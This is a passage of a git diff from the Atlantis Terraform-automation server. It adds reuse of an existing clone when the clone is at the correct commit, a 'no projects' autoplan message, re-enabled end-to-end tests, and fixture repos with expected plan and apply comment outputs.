 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
 create mode 100644 server/testfixtures/test-repos/modules-yaml/production/main.tf
 create mode 100644 server/testfixtures/test-repos/modules-yaml/staging/main.tf
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-production.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-production.txt
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
 create mode 100644 server/testfixtures/test-repos/modules/modules/null/main.tf
 create mode 100644 server/testfixtures/test-repos/modules/production/main.tf
 create mode 100644 server/testfixtures/test-repos/modules/staging/main.tf

diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
index 190b87790d..67112b1ce4 100644
--- a/server/events/atlantis_workspace.go
+++ b/server/events/atlantis_workspace.go
@@ -18,6 +18,7 @@ import (
 	"os/exec"
 	"path/filepath"
 	"strconv"
+	"strings"
 
 	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
@@ -48,7 +49,9 @@ type FileWorkspace struct {
 }
 
 // Clone git clones headRepo, checks out the branch and then returns the absolute
-// path to the root of the cloned repo.
+// path to the root of the cloned repo. If the repo already exists and is at
+// the right commit it does nothing. This is to support running commands in
+// multiple dirs of the same repo without deleting existing plans.
 func (w *FileWorkspace) Clone(
 	log *logging.SimpleLogger,
 	baseRepo models.Repo,
@@ -57,11 +60,27 @@ func (w *FileWorkspace) Clone(
 	workspace string) (string, error) {
 	cloneDir := w.cloneDir(baseRepo, p, workspace)
 
-	// This is safe to do because we lock runs on repo/pull/workspace so no one else
-	// is using this workspace.
-	log.Info("cleaning clone directory %q", cloneDir)
-	if err := os.RemoveAll(cloneDir); err != nil {
-		return "", errors.Wrap(err, "deleting old workspace")
+	// If the directory already exists, check if it's at the right commit.
+	// If so, then we do nothing.
+	if _, err := os.Stat(cloneDir); err == nil {
+		revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec
+		revParseCmd.Dir = cloneDir
+		output, err := revParseCmd.CombinedOutput()
+		if err != nil {
+			return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output))
+		}
+		currCommit := strings.Trim(string(output), "\n")
+		if string(currCommit) == p.HeadCommit {
+			log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit)
+			return cloneDir, nil
+		}
+		log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, string(currCommit))
+
+		// It's okay to delete all plans now since they're out of date.
+		log.Info("cleaning clone directory %q", cloneDir)
+		if err := os.RemoveAll(cloneDir); err != nil {
+			return "", errors.Wrap(err, "deleting old workspace")
+		}
 	}
 
 	// Create the directory and parents if necessary.
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
index 601d3be099..bfd25dd935 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_handler.go
@@ -195,7 +195,7 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) {
 	if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil {
 		ctx.Log.Warn("unable to update commit status: %s", err)
 	}
-	comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose)
+	comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan)
 	c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
 }
 
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index 4094c3861c..0f623f04a6 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -58,7 +58,7 @@ type ProjectResultTmplData struct {
 
 // Render formats the data into a markdown string.
 // nolint: interfacer
-func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string {
+func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string {
 	commandStr := strings.Title(cmdName.String())
 	common := CommonData{commandStr, verbose, log}
 	if res.Error != nil {
@@ -67,6 +67,9 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log
 	if res.Failure != "" {
 		return m.renderTemplate(failureWithLogTmpl, FailureData{res.Failure, common})
 	}
+	if len(res.ProjectResults) == 0 && autoplan {
+		return m.renderTemplate(autoplanNoProjectsWithLogTmpl, common)
+	}
 	return m.renderProjectResults(res.ProjectResults, common)
 }
 
@@ -145,9 +148,12 @@ var errTmplText = "**{{.Command}} Error**\n" +
 	"```\n" +
 	"{{.Error}}\n" +
 	"```\n"
+var autoplanNoProjectsTmplText = "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n"
 var errTmpl = template.Must(template.New("").Parse(errTmplText))
 var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl))
 var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n"
 var failureTmpl = template.Must(template.New("").Parse(failureTmplText))
 var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl))
+var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText))
+var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl))
 var logTmpl = "{{if .Verbose}}\n<details><summary>Log</summary>\n  <p>\n\n```\n{{.Log}}```\n</p></details>{{end}}\n"
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index e2bb30ff6e..2cd7183c07 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -6,6 +6,7 @@ import (
 	"io/ioutil"
 	"net/http"
 	"net/http/httptest"
+	"os"
 	"os/exec"
 	"path/filepath"
 	"regexp"
@@ -58,40 +59,40 @@ func TestGitHubWorkflow(t *testing.T) {
 		ExpMergeCommentFile    string
 		CommentAndReplies      []string
 	}{
-		//{
-		//	Description:            "simple",
-		//	RepoDir:                "simple",
-		//	ModifiedFiles:          []string{"main.tf"},
-		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
-		//	CommentAndReplies: []string{
-		//		"atlantis apply", "exp-output-apply.txt",
-		//	},
-		//	ExpMergeCommentFile: "exp-output-merge.txt",
-		//},
-		//{
-		//	Description:            "simple with comment -var",
-		//	RepoDir:                "simple",
-		//	ModifiedFiles:          []string{"main.tf"},
-		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
-		//	CommentAndReplies: []string{
-		//		"atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt",
-		//		"atlantis apply", "exp-output-apply-var.txt",
-		//	},
-		//	ExpMergeCommentFile: "exp-output-merge.txt",
-		//},
-		//{
-		//	Description:            "simple with workspaces",
-		//	RepoDir:                "simple",
-		//	ModifiedFiles:          []string{"main.tf"},
-		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
-		//	CommentAndReplies: []string{
-		//		"atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt",
-		//		"atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt",
-		//		"atlantis apply", "exp-output-apply-var-default-workspace.txt",
-		//		"atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt",
-		//	},
-		//	ExpMergeCommentFile: "exp-output-merge-workspaces.txt",
-		//},
+		{
+			Description:            "simple",
+			RepoDir:                "simple",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis apply", "exp-output-apply.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
+		{
+			Description:            "simple with comment -var",
+			RepoDir:                "simple",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt",
+				"atlantis apply", "exp-output-apply-var.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
+		{
+			Description:            "simple with workspaces",
+			RepoDir:                "simple",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt",
+				"atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt",
+				"atlantis apply", "exp-output-apply-var-default-workspace.txt",
+				"atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge-workspaces.txt",
+		},
 		{
 			Description:            "simple with atlantis.yaml",
 			RepoDir:                "simple-yaml",
@@ -103,18 +104,52 @@ func TestGitHubWorkflow(t *testing.T) {
 			},
 			ExpMergeCommentFile: "exp-output-merge.txt",
 		},
+		{
+			Description:            "modules staging only",
+			RepoDir:                "modules",
+			ModifiedFiles:          []string{"staging/main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan-only-staging.txt",
+			CommentAndReplies: []string{
+				"atlantis apply -d staging", "exp-output-apply-staging.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge-only-staging.txt",
+		},
+		{
+			Description:            "modules modules only",
+			RepoDir:                "modules",
+			ModifiedFiles:          []string{"modules/null/main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan-only-modules.txt",
+			CommentAndReplies: []string{
+				"atlantis plan -d staging", "exp-output-plan-staging.txt",
+				"atlantis plan -d production", "exp-output-plan-production.txt",
+				"atlantis apply -d staging", "exp-output-apply-staging.txt",
+				"atlantis apply -d production", "exp-output-apply-production.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge-all-dirs.txt",
+		},
+		{
+			Description:            "modules-yaml",
+			RepoDir:                "modules-yaml",
+			ModifiedFiles:          []string{"modules/null/main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis apply -d staging", "exp-output-apply-staging.txt",
+				"atlantis apply -d production", "exp-output-apply-production.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge-all-dirs.txt",
+		},
 	}
 	for _, c := range cases {
 		t.Run(c.Description, func(t *testing.T) {
 			ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
 			// Set the repo to be cloned through the testing backdoor.
-			repoDir, cleanup := initializeRepo(t, c.RepoDir)
+			repoDir, headSHA, cleanup := initializeRepo(t, c.RepoDir)
 			defer cleanup()
 			atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir)
 
 			// Setup test dependencies.
 			w := httptest.NewRecorder()
-			When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil)
+			When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(headSHA), nil)
 			When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil)
 
 			// First, send the open pull request event and trigger an autoplan.
@@ -122,9 +157,7 @@ func TestGitHubWorkflow(t *testing.T) {
 			ctrl.Post(w, pullOpenedReq)
 			responseContains(t, w, 200, "Processing...")
 			_, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-			exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile))
-			Ok(t, err)
-			Equals(t, string(exp), autoplanComment)
+			assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir)
 
 			// Now send any other comments.
 			for i := 0; i < len(c.CommentAndReplies); i += 2 {
@@ -136,16 +169,7 @@ func TestGitHubWorkflow(t *testing.T) {
 				ctrl.Post(w, commentReq)
 				responseContains(t, w, 200, "Processing...")
 				_, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-
-				exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile))
-				Ok(t, err)
-				// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
-				idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
-				atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)")
-				if string(exp) != atlantisComment {
-					t.Logf("comment: %s", comment)
-				}
-				Equals(t, string(exp), atlantisComment)
+				assertCommentEquals(t, expOutputFile, atlantisComment, c.RepoDir)
 			}
 
 			// Finally, send the pull request merged event.
@@ -155,9 +179,7 @@ func TestGitHubWorkflow(t *testing.T) {
 			responseContains(t, w, 200, "Pull request cleaned successfully")
 			numPrevComments := (len(c.CommentAndReplies) / 2) + 1
 			_, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-			exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile))
-			Ok(t, err)
-			Equals(t, string(exp), pullClosedComment)
+			assertCommentEquals(t, c.ExpMergeCommentFile, pullClosedComment, c.RepoDir)
 		})
 	}
 }
@@ -166,8 +188,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	allowForkPRs := false
 	dataDir, cleanup := TempDir(t)
 	defer cleanup()
-	testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple")
-	Ok(t, err)
 
 	// Mocks.
 	e2eVCSClient := vcsmocks.NewMockClientProxy()
@@ -199,7 +219,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	}
 	atlantisWorkspace := &events.FileWorkspace{
 		DataDir:                 dataDir,
-		TestingOverrideCloneURL: testRepoDir,
+		TestingOverrideCloneURL: "override-me",
 	}
 
 	defaultTFVersion := terraformClient.Version()
@@ -318,7 +338,11 @@ func GitHubPullRequestClosedEvent(t *testing.T) *http.Request {
 	return req
 }
 
-func GitHubPullRequestParsed() *github.PullRequest {
+func GitHubPullRequestParsed(headSHA string) *github.PullRequest {
+	// headSHA can't be empty so default if not set.
+	if headSHA == "" {
+		headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d"
+	}
 	return &github.PullRequest{
 		Number:  github.Int(1),
 		State:   github.String("open"),
@@ -328,7 +352,7 @@ func GitHubPullRequestParsed() *github.PullRequest {
 				FullName: github.String("runatlantis/atlantis-tests"),
 				CloneURL: github.String("/runatlantis/atlantis-tests.git"),
 			},
-			SHA: github.String("sha"),
+			SHA: github.String(headSHA),
 			Ref: github.String("branch"),
 		},
 		Base: &github.PullRequestBranch{
@@ -343,15 +367,21 @@ func GitHubPullRequestParsed() *github.PullRequest {
 	}
 }
 
+// absRepoPath returns the absolute path to the test repo under dir repoDir.
+func absRepoPath(t *testing.T, repoDir string) string {
+	path, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir))
+	Ok(t, err)
+	return path
+}
+
 // initializeRepo copies the repo data from testfixtures and initializes a new
 // git repo in a temp directory. It returns that directory and a function
 // to run in a defer that will delete the dir.
 // The purpose of this function is to create a real git repository with a branch
 // called 'branch' from the files under repoDir. This is so we can check in
 // those files normally without needing a .git directory.
-func initializeRepo(t *testing.T, repoDir string) (string, func()) {
-	originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir))
-	Ok(t, err)
+func initializeRepo(t *testing.T, repoDir string) (string, string, func()) {
+	originRepo := absRepoPath(t, repoDir)
 
 	// Copy the files to the temp dir.
 	destDir, cleanup := TempDir(t)
@@ -365,13 +395,37 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) {
 	runCmd(t, destDir, "git", "checkout", "-b", "branch")
 	runCmd(t, destDir, "git", "add", ".")
 	runCmd(t, destDir, "git", "commit", "-am", "branch commit")
+	headSHA := runCmd(t, destDir, "git", "rev-parse", "HEAD")
+	headSHA = strings.Trim(headSHA, "\n")
 
-	return destDir, cleanup
+	return destDir, headSHA, cleanup
 }
 
-func runCmd(t *testing.T, dir string, name string, args ...string) {
+func runCmd(t *testing.T, dir string, name string, args ...string) string {
 	cpCmd := exec.Command(name, args...)
 	cpCmd.Dir = dir
 	cpOut, err := cpCmd.CombinedOutput()
 	Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut)
+	return string(cpOut)
+}
+
+func assertCommentEquals(t *testing.T, expFile string, act string, repoDir string) {
+	t.Helper()
+	exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile))
+	Ok(t, err)
+
+	// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
+	idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
+	act = idRegex.ReplaceAllString(act, "(ID: ******************)")
+
+	if string(exp) != act {
+		actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
+		err := ioutil.WriteFile(actFile, []byte(act), 0600)
+		Ok(t, err)
+		cwd, err := os.Getwd()
+		Ok(t, err)
+		rel, err := filepath.Rel(cwd, actFile)
+		Ok(t, err)
+		t.Errorf("%q was different, wrote actual comment to %q", expFile, rel)
+	}
 }
diff --git a/server/testfixtures/test-repos/modules-yaml/atlantis.yaml b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
new file mode 100644
index 0000000000..e5915f3911
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
@@ -0,0 +1,8 @@
+version: 2
+projects:
+- dir: staging
+  autoplan:
+    when_modified: ["**/*.tf", "../modules/null/*"]
+- dir: production
+  autoplan:
+    when_modified: ["**/*.tf", "../modules/null/*"]
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
new file mode 100644
index 0000000000..81c3ec8bfa
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..2ec35e2786
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..f9a2c26ebc
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` path: `staging`
+1. workspace: `default` path: `production`
+
+### 1. workspace: `default` path: `staging`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` path: `production`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9712df1ee2
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..49c8312cd7
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..b64103b412
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
+- path: `runatlantis/atlantis-tests/.` workspace: `default`
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
new file mode 100644
index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+  value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules-yaml/production/main.tf b/server/testfixtures/test-repos/modules-yaml/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+  source = "../modules/null"
+  var = "production"
+}
+output "var" {
+  value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/staging/main.tf b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+  source = "../modules/null"
+  var = "staging"
+}
+output "var" {
+  value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
new file mode 100644
index 0000000000..81c3ec8bfa
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..2ec35e2786
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
new file mode 100644
index 0000000000..63b09ca64f
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
@@ -0,0 +1,2 @@
+Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9712df1ee2
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..49c8312cd7
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt
new file mode 100644
index 0000000000..b64103b412
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
+- path: `runatlantis/atlantis-tests/.` workspace: `default`
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
new file mode 100644
index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
